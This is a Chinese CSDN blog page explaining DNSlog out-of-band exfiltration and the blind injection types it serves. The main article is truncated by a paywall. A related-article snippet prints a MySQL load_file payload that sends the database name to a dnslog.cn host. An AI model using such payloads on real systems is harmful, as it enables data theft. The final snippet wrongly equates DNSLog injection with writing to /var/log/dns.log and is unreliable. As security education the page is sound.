dnslog外带是什么

最新推荐文章于 2025-04-02 13:05:07 发布

安全小牛马

最新推荐文章于 2025-04-02 13:05:07 发布

阅读量1.8k

点赞数 13

分类专栏： web安全文章标签：安全

本文链接：https://blog.csdn.net/m0_62467948/article/details/138853828

版权

前言

在看hw面经的时候发现了dnslog外带的相关的知识点，有点迷惑，所以写下这篇文章记录，方便日后查阅。

正文

DNSlog是什么？

要回答这个我们需要先清楚，DNS：(Domain Name System)域名系统，负责把域名转换成IP地址。那么dnslog就是

DNS的日志，就是存储在DNS Server上的域名访问信息，它记录着用户对域名littlehann.com等的访问信息，类似日志文件。

DNSlog外带原理

DNS在解析的时候会留下日志，我们将信息放在高级域名中，传递到自己这里，然后通过读日志获取信息。也就是在一些网站通过dns请求后，通过读取日志来获取我们的请求信息。可能有点难以理解

我们换一种说法dnslog外带是指利用 DNS 查询来实现数据传输或者执行远程命令的技术。这种技术的基本原理是将数据嵌入到 DNS 查询中，然后将其发送到一个能够捕获 DNS 查询的服务器上，最后解析查询以获取嵌入的数据。

DNSlog 外带通常用于绕过网络安全防御，因为 DNS 查询通常允许通过防火墙，且大多数网络都允许 DNS 查询的出站流量。这使得攻击者可以利用 DNS 查询来传输数据或执行恶意操作，而不容易被检测到。

DNSlog注入

既然能够嵌入一些数据那么，就能想到注入，dns注入常被用在dnslog通常用在：

 1.SQL盲注
 2.无回显的XSS
 3.无回显的命令执行
 5.无回显的SSRF
 5.Blind XXE

mysql-DNSlog外带注入

当我们对一个

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

安全小牛马

关注关注

13
点赞
踩
27

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

利用DNSlog外带数据注入

qq_68163788的博客

02-12

1130

在SQL注入中，利用DNSlog外带数据是一种有效的技术，特别是在面对盲注时。DNSlog平台，如CEYE和Burpsuite专业版，允许用户生成域名并记录访问情况。通过将特定数据嵌入DNS请求中，攻击者可以获取敏感信息。在SQL注入的场景下，特别是当secure_file_priv值为空时，可以使用LOAD_FILE和INTO OUTFILE语句导出数据。以靶场测试为例，攻击者可以通过时间盲注的方法逐步推测数据库的名称。通过发送特定的SQL语句，结合SLEEP函数，攻击者可以判断出数据库名的字符。

sqlmap + dnslog外带数据：

CYLK1987310466的博客

08-06

1148

sqlmap dnslog外带数据

1 条评论您还未登录，请先登录后发表或查看评论

DNSlog外带

adaosanqian的博客

02-28

7743

减轻盲注的复杂操作，运用DNSlog外带来进行操作

DNS数据外带

最新发布

2301_78866120的博客

04-02

930

DNS数据外带

【技巧】DNSlog外带文件

qinjilll的博客

08-23

2738

我们都知道DNS就是将域名解析为ip，用户在浏览器上输入一个域名A.com，就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1，这样就可以访问127.0.0.1服务器上的相应服务。那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息，它记录着用户对域名等的访问信息，类似日志文件。我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功。

Web漏洞知识梳理笔记--DNSlog数据外带

qq_47742555的博客

12-24

1402

DNSlog 数据外带技术利用了服务器发出的 DNS 请求来确认漏洞的存在和执行结果。通过利用 DNSlog 服务，攻击者可以有效检测 SSRF、盲注、RCE 等漏洞，并可能外带一些敏感数据。为了防范此类攻击，需要对外部请求进行严格限制，并加强对服务器网络访问的监控与防护。dnslog.cn。

DNSlog外带原理及注入分析

Sentiment的博客

04-27

1万+

前言最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过，所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统，负责把域名转换成IP地址；例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志，DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志，我们将信息放在高级域名中，传递到

sqlmap结合dnslog外带注入

newlife1441的博客

08-05

750

目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...

https防止注入_数据库DNSLog外带注入总结

weixin_39553600的博客

11-20

643

sql注入中利用的骚姿势你又知道几个？DNSLog外带注入和DNSlog带外注入？(OOB)其实是一样的，叫法不同！本人还是习惯叫外带注入，自我感觉，比较顺口为什么需要外带注入？当我们对一个数据库进行注入时，无回显，且无法进行时间注入，那么就可以利用一个通道，把查询到数据通过通道带出去，这里的通道包括：http请求、DNS解析、SMB服务等...

创新蓝队-针对DNSlog数据外带攻击的应急与预防

Liyu_6618的博客

02-01

3065

创新蓝队-针对DNSlog数据外带攻击的应急与预防

【DNS外带】

03-01

926

DNS_LOG外带 DNSLOG.cn （实际情况中你发现渗透的时候，有布尔型注入，但是很花时间，你有什么别的方法能够加快时间- 解决办法DNS_LOG外带）普通DNS外带 http://dnslog.cn/ select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc')) 通过16进制编码DNS外带 select load_file(concat('\\\\',(select substr..

SQL注入之DNSLog外带注入

dragon的博客

02-21

3333

什么是dnslog呢？DNS就是域名解析服务，把一个域名转换成对应的IP地址，转换完成之后，DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息，这个日志就叫DNSLog。但是想要查看DNSLog信息的人，必须是拥有DNS服务器权限的人，这就使的我们要是用dnslog注入方法的话，就需要搭建自己的一个dns服务器，成本相对较高。所以在此就推荐两个平台，可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。

sqlmap+dnslog外带数据

m0_52813136的博客

08-04

447

sqlmap dnslog

DNSlog外带数据注入

C_LCH_2000的博客

08-04

1579

盲注代替 DNS log即DNS日志，域名解析的记录。

dns外带数据【渗透测试】

热门推荐

leeezp的博客

09-09

32万+

上一篇文章我们已经介绍了搭建自己的dns log server 方法，接下来我将介绍如何通过dns query外带数据。下文中介绍的方法均为根据本人经验原创的方法，网上应该算是首次公开。

写bat脚本双击执行

qq_35911118的博客

04-08

3136

@echo off　　　　　　　　　　　不显示后续命令行及当前命令行 dir c:*.* >a.txt　　　　　　　将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat　　　　调用ucdos echo 你好　　　　　　　　　　显示"你好" pause 　　　　　　　　　　　　暂停,等待按键继续 rem 准备运行wps 　　　　　　　注释：准备运行wps cd ucdos　　　　　　　　　　　进入ucdos目录 wps 　　　　　　　　　　　　　运行wps @echo

渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入

weixin_52796034的博客

10-10

1207

通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入，但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.

DNSlog注入信息的带外|外带 sql注入利用详解+实操

weixin_48083470的博客

08-04

5247

DNSlog注入 DNSlog注入原理 dnslog注入也可以称之为dns带外查询，是一种注入姿势，可以通过查询相应的dns解析记录，来获取我们想要的数据一般情况下，在我们无法通过联合查询直接获取数据的情况下，我们只能通过盲注，来一步步的获取数据，但是，使用盲注，手工测试是需要花费大量的时间的，可能会想到使用sqlmap直接去跑出数据，但在实际测试中，使用sqlmap跑盲注，有很大的几率，网站把ip给封掉，这就影响了我们的测试进度首先说明，dns带外查询属于MySQL注入，在MySQL中有个系统属性 s

dnslog外带注入用什么函数

10-26

DNSLog外带注入通常是指通过修改DNS查询日志文件（如在Linux系统中的/var/log/dns.log）来实施恶意攻击的一种技术。这种注入攻击通常涉及对DNS查询数据包添加额外的信息，目的是绕过防火墙规则或是进行更进一步的身份验证欺骗。对于利用DNSLog进行注入，一种常见的手段是通过shell脚本或者程序直接向日志文件写入特定的数据，比如使用`echo`命令、`printf`函数或者是文件操作函数（如`write`、`fprintf`等）。例如，在Unix/Linux环境中，你可以使用类似下面的命令： ```bash echo "恶意注入的数据" >> /var/log/dns.log ``` 或者如果是在Python等支持文件操作的语言中，可能会这样写： ```python with open('/var/log/dns.log', 'a') as log_file: log_file.write('恶意注入的数据\n') ``` 然而，需要注意的是，许多系统会对DNS日志的权限进行限制，如果没有相应的权限，上述操作可能会失败。而且，实际的攻击场景会更复杂，可能需要结合网络嗅探工具或者漏洞利用技巧才能成功。